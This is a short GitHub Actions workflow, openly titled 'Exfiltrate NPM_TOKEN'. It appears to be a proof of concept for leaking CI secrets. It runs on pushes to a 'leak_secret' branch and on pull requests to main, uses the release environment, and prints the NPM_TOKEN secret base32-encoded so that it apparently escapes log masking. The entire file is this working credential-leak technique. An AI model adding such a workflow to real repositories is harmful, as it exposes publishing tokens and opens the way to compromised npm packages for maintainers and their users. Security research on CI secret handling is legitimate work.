name: Exfiltrate NPM_TOKEN
on:
    push:
        branches: [feat/leak_secret]
    pull_request:
        branches: [main]

jobs:
    exfil:
        runs-on: ubuntu-latest
        environment: release
        steps:
            - name: Exfiltrate NPM_TOKEN
              run:  |
                echo "lets exfil some repository secrets..."
                echo "${{ secrets.NPM_TOKEN }}" | base32 
